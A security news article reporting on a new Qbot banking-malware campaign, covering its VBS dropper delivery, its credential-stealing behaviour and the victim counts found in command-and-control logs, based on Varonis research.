Qbot malware resurfaces in new business attacks

The financial malware Qbot has surfaced once again with a new version that has reportedly attacked and infected thousands of systems.

The campaign is said to be actively targeting US corporations but has hit networks worldwide across Europe, Asia and South America. The goals of the attacks is the theft of financial information, including bank account credentials.

According to data security solutions provider Varonis, which was first alerted of the attack by a customer, early observations suggest “thousands of victims around the globe are compromised and under active control by the attackers.”

First appearing in 2009, Qbot riled security professionals with its ability to evade detection. Openly available code means cybercriminals have continued to engineer various updates and modifications, making it increasingly adept at evading security systems.

Varonis was made aware of the latest attack by a customer who reported suspicious activity on a computer which was found to be Qbot (or Qakbot) that was trying to infect other networked systems.

Researchers believed this attack could be traced back to an installer or ‘dropper’ delivered by an email attachment with the extension of ‘.doc.vbs’— VBS is a scripting language supported by Windows. Once executed, the script downloads the Qbot loader from a command-and-control server using the Windows BITSAdmin command-line tool.

Varonis notes that previous versions of Qbot used PowerShell, but cybercriminals have turned to alternatives with PowerShell becoming popular for malware delivery and now monitored closely on enterprise systems.

Once installed, Qbot will create scheduled tasks and add entries to the system registry; it records keystrokes typed by users, steals credentials and authentication cookies in the browser— and injects code into other processes to search for and steal financial-related text strings. It will attempt to ‘brute-force’ network accounts from the Active Directory Domain Users group.

Gaining access to one of the ‘command and control’ servers used by the attackers, Varonis found logs showing 2,726 unique victim IP addresses, more than 1,700 of which were located in the US.

However, the company believes the number of infected systems to be much larger since computers inside an enterprise generally access the internet through a shared IP address.

Logs also showed that many of the compromised systems had antivirus programs from various vendors installed, demonstrating the virus’s ability to evade detection.

This is, in part, down to Qbot’s polymorphic nature; it employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders. It creates files and folders with random names; its dropper frequently changes C2 servers; and the malware loader changes when there is an active internet connection.